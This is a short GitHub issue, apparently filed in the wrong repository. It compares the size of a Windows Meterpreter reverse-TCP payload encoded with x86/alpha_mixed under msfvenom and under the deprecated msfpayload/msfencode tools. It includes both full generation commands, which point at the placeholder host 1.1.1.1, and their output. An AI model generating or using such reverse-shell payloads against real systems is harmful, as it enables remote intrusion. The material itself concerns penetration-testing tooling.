rapid7/meterpreter

msfvenom vs msfpayload/msfencode payload size difference

corelanc0d3r opened this issue · 1 comments

I have noticed some payload size differences between msfvenom and msfpayload/msfencode:

msfvenom (702 bytes):

./msfvenom -p windows/meterpreter/reverse_tcp exitfunc=thread lhost=1.1.1.1 -a x86 -e x86/alpha_mixed -f c

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 702 (iteration=0)
Payload size: 702 bytes

msfpayload/msfencode (624 bytes):

./msfpayload windows/meterpreter/reverse_tcp exitfunc=thread lhost=1.1.1.1 R | ./msfencode -e x86/alpha_mixed -type c

[!] ************************************************************************
[!] *               The utility msfpayload is deprecated!                  *
[!] *              It will be removed on or about 2015-06-08               *
[!] *                   Please use msfvenom instead                        *
[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *
[!] ************************************************************************
[!] ************************************************************************
[!] *               The utility msfencode is deprecated!                   *
[!] *              It will be removed on or about 2015-06-08               *
[!] *                   Please use msfvenom instead                        *
[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *
[!] ************************************************************************
[*] x86/alpha_mixed succeeded with size 624 (iteration=1)

sorry, wrong place